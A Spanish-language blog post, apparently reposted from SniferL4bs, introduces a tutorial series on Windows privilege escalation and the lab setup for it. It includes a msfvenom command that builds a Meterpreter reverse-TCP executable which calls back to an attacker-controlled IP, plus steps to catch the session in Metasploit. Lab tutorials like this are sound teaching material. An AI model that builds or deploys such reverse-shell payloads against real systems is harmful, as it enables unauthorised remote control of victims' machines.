3 mar. 2016

Escalar privilegios en Windows con y sin exploits

La siguiente serie de post desarrollado por Eric Balderrama surge de dos disparadores, uno de ellos fue un comentario sobre la dificultad para escalar privilegios en la vm del desafío que presentamos como finalización de la serie de penetration with kali. El segundo, leer en un writeup sobre un script llamado linuxprivchecker.py, con lo cual decidí buscar más información sobre el proceso de escalación de privilegios para mejorar mis skills y compartirlo a modo de resumen.

Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaré Debian + Katoolin.
Como los siguientes post se tratan sobre escalamiento de privilegios, pasaremos por alto la etapa de obtener acceso al sistema. A modo de recomendación, para llevar a cabo estos ejemplos sin muchas complicaciones, pueden crearse un .exe desde msfvenom y correrlo en el equipo víctima de la siguiente manera:
msfvenom -p windows/metertpreter/reverse_tcp LPORT={puerto}
LHOST={Dirección ip atacante} -f exe > shell.exe

Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
Fuente: SniferL4bs

1 comentario:

  1. Esto no es escalar privilegios, es solo correr un programa como admin...

    ResponderEliminar

Gracias por dejar un comentario en Segu-Info
Si vas a dejar una consulta, procura tener habilitado tu perfil en Blogger o deja una forma de contacto.

Gracias por comentar!